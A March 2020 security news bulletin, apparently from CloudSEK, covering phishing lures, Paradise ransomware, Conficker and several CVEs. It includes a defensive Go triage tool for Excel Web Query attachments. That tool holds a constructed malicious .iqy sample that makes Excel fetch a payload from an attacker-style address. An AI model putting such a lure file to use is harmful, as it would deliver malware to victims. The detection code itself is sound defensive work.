
CloudSEK Daily Threat Bulletin – 10th March 2020

Round Up of Major Breaches and Scams

Years-long campaign targets hackers through trojanized hacking tools

A Vietnam-based threat group has been hacking other hackers by distributing njRAT-infected hacking tools. Rather than compromising systems directly, trojanizing the tools that other attackers use gives the group access to a much larger pool of stolen data. The trojanized tools have been circulating for years and include site scrapers, exploit scanners, SQL injection tools, credential-checking tools, and even a trojanized build of the Chrome browser.

Bogus HIV test results are the latest lures used by cybercrooks

Even as COVID-19 themed phishing flourishes, attackers have started distributing malware in emails purporting to contain HIV test results. Because misinformation and fear about HIV remain widespread, recipients are inclined to open the attachment. A Russian hacking group reportedly sent about 200 such emails to employees of large North American pharmaceutical and insurance companies. The attachment infects the companies' systems with the Koadic RAT, which lets the attackers log keystrokes and execute code on the affected machines.

Round Up of Major Malware and Ransomware Incidents

How poor IoT security is allowing this 12-year-old malware to make a comeback

Poor security of Internet of Things (IoT) devices is keeping the antiquated Conficker malware alive. Conficker, first spotted in 2008, primarily exploits flaws in Windows XP and older versions. Its recent resurgence has been attributed to connected medical devices that still run outdated or unsupported versions of Windows. Recently, a hospital detected unusual activity on a mammography machine and found that several of its devices had been infected by Conficker. The hospital took the affected systems offline and installed patches.

Paradise Ransomware distributed via uncommon spam attachment

Attackers have started sending Excel Web Query (.iqy) attachments in phishing campaigns to download and install the Paradise Ransomware on victims' machines. Paradise Ransomware is fairly old, with activity going back to September 2017 when a victim first reported it in the BleepingComputer forums. Since then there has been a steady trickle of victims, as can be seen from submissions to the ransomware identification site ID-Ransomware.
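An Excel Web Query file is plain text: the first line reads "WEB", the second is a version number, the third is the URL Excel fetches when the file is opened, and any further lines are optional parameters. That makes the attachment easy to triage at a mail gateway. The Go code below is an added example written for this bulletin, not tooling from CloudSEK, BleepingComputer or ID-Ransomware; the two sample files, the approved-host list and the `ParseIQY`/`Assess` function names are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// IQY is the parsed form of an Excel Web Query (.iqy) file: a plain-text
// file whose first line is "WEB", second line a version number, third line
// the URL Excel fetches on open, followed by optional parameter lines.
type IQY struct {
	Version string
	URL     string
	Params  []string
}

// ParseIQY parses .iqy content. It is deliberately lenient (strips a BOM,
// ignores blank lines) because its job is mail-gateway triage, not fidelity
// to Excel's own parser.
func ParseIQY(data string) (*IQY, error) {
	data = strings.TrimPrefix(data, "\ufeff")
	var lines []string
	for _, l := range strings.Split(strings.ReplaceAll(data, "\r\n", "\n"), "\n") {
		if l = strings.TrimSpace(l); l != "" {
			lines = append(lines, l)
		}
	}
	if len(lines) < 3 || !strings.EqualFold(lines[0], "WEB") {
		return nil, errors.New("not an Excel Web Query file")
	}
	return &IQY{Version: lines[1], URL: lines[2], Params: lines[3:]}, nil
}

// Assess decides whether the query target is acceptable. allowedHosts is the
// (hypothetical) set of internal data sources users legitimately query; any
// other target makes Excel reach out to an arbitrary server on open, which is
// exactly the behaviour the Paradise campaign abuses.
func Assess(q *IQY, allowedHosts map[string]bool) (verdict string, reasons []string) {
	u, err := url.Parse(q.URL)
	if err != nil {
		return "block", []string{"unparseable URL: " + err.Error()}
	}
	host := strings.ToLower(u.Hostname())
	switch strings.ToLower(u.Scheme) {
	case "https":
	case "http":
		reasons = append(reasons, "cleartext http: content can be swapped in transit")
	default:
		reasons = append(reasons, "non-web scheme "+u.Scheme)
	}
	if host == "" || !allowedHosts[host] {
		reasons = append(reasons, "target host "+host+" is not an approved data source")
	}
	if len(reasons) > 0 {
		return "block", reasons
	}
	return "allow", nil
}

// Constructed sample modelled on the lure: a three-line .iqy that makes Excel
// fetch a payload from an attacker-controlled address (TEST-NET-3 range).
const maliciousIQY = "WEB\r\n1\r\nhttp://203.0.113.45/office/update.dat\r\n"

// Constructed benign sample: an internal HTTPS report endpoint with a parameter.
const benignIQY = "WEB\n1\nhttps://reports.corp.example/sales.aspx\nSelection=AllTables\n"

// approved is the hypothetical allowlist of internal query hosts.
var approved = map[string]bool{"reports.corp.example": true}

func main() {
	for _, s := range []string{maliciousIQY, benignIQY} {
		q, err := ParseIQY(s)
		if err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		v, why := Assess(q, approved)
		fmt.Printf("%-5s %s %v\n", v, q.URL, why)
	}
}
```

The allowlist approach is deliberate: a denylist of known-bad URLs lags every new campaign, whereas almost no organisation has a legitimate reason for mail-borne .iqy files to pull data from hosts outside its own reporting systems.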

Round Up of Major Vulnerabilities and Patches

Microsoft Patch Tuesday — March 2020: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month’s Patch Tuesday covers 117 vulnerabilities, 25 of which are considered critical. There is also one moderate vulnerability and 91 that are considered important. This month’s patches include updates to Microsoft Media Foundation, the GDI+ API and Windows Defender, among others.

Firefox bug opens iPhone AirPods to third-party Snooping

Version 74 of the Firefox browser addresses 12 vulnerabilities: 5 rated high, 6 medium, and 1 low severity. One interesting medium-severity bug allowed websites that had been granted camera or microphone permission to enumerate connected device names; because AirPods are named after their owner by default, this leaked the iPhone user's name. Mozilla also released Firefox ESR 68.6, the extended support version aimed at enterprises.

Avast AntiTrack certificate bug allowed others to snoop on your online activities

A certificate validation flaw (CVE-2020-8987) in Avast AntiTrack and AVG AntiTrack leaves PCs vulnerable to Man-in-The-Middle (MiTM) attacks, browser session hijacks, and data theft. Attackers can exploit it without local access or any software configuration changes. Users are urged to update to the patched Avast AntiTrack and AVG AntiTrack versions.

Hackers exploiting recently patched ManageEngine Desktop Central vulnerability

A recently disclosed vulnerability affecting Zoho’s ManageEngine Desktop Central endpoint management solution is already being exploited in attacks. The flaw, tracked as CVE-2020-10189, was patched by ManageEngine over the weekend with the release of version 10.0.479. Following reports that the vulnerability has been exploited in the wild, the vendor also published an advisory with instructions for identifying a compromised installation.

Load Value Injection: Intel CPUs vulnerable to reverse Meltdown attack

Many processors made by Intel are vulnerable to a newly disclosed type of attack named Load Value Injection (LVI), but the chip maker has told customers that the attack is not very practical in real world environments. The vulnerability, tracked as CVE-2020-0551, was first reported to Intel in April 2019 by Jo Van Bulck from the KU Leuven research university in Belgium and it was analyzed by a team from universities in the United States, Austria and Australia, including some of the researchers who first discovered the Meltdown and Spectre vulnerabilities.

Vulnerability spotlight: Information disclosure in Windows 10 kernel

Cisco Talos recently discovered an information disclosure vulnerability in the Windows 10 kernel. An attacker could exploit this vulnerability by tricking the victim into opening a specially crafted executable, causing an out-of-bounds read, which leads to the disclosure of sensitive information. Microsoft disclosed and patched this bug as part of their monthly security update Tuesday.